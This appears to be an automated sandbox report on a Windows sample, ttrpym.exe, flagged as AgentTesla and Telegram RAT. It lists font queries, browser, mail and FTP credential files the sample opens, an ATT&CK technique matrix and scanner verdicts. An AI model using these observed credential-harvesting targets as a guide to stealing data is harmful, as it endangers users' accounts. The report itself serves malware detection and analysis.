              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00415B06 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_00415B06
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012BABDE GetUserNameW,3_2_012BABDE
              Source: C:\Users\user\Desktop\ttrpym.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ttrpym.exe PID: 6732, type: MEMORY
              Source: Yara matchFile source: 3.2.ttrpym.exe.f80000.2.unpack, type: UNPACKEDPE
              Yara detected Telegram RATShow sources
              Source: Yara matchFile source: Process Memory Space: ttrpym.exe PID: 6732, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\ttrpym.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\ttrpym.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\Desktop\ttrpym.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: Yara matchFile source: 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ttrpym.exe PID: 6732, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ttrpym.exe PID: 6732, type: MEMORY
              Source: Yara matchFile source: 3.2.ttrpym.exe.f80000.2.unpack, type: UNPACKEDPE
              Yara detected Telegram RATShow sources
              Source: Yara matchFile source: Process Memory Space: ttrpym.exe PID: 6732, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API21Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Process Injection12Obfuscated Files or Information3Security Account ManagerSystem Information Discovery124SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSQuery Registry1Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSecurity Software Discovery241SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion13DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection12/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              ttrpym.exe50%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              ttrpym.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              3.2.ttrpym.exe.f80000.2.unpack100%AviraTR/Spy.Gen8Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://www.carterandcone.comes0%Avira URL Cloudsafe
              http://www.fontbureau.comttvaZ0%Avira URL Cloudsafe
              http://www.zhongyicts.com.cnr-c0%Avira URL Cloudsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.carterandcone.comma0%Avira URL Cloudsafe
              http://www.carterandcone.comamFA0%Avira URL Cloudsafe
              http://www.urwpp.deoi0%Avira URL Cloudsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
              http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
              http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.founder.com.cn/cnomp0%Avira URL Cloudsafe
              http://www.urwpp.dewa0%Avira URL Cloudsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
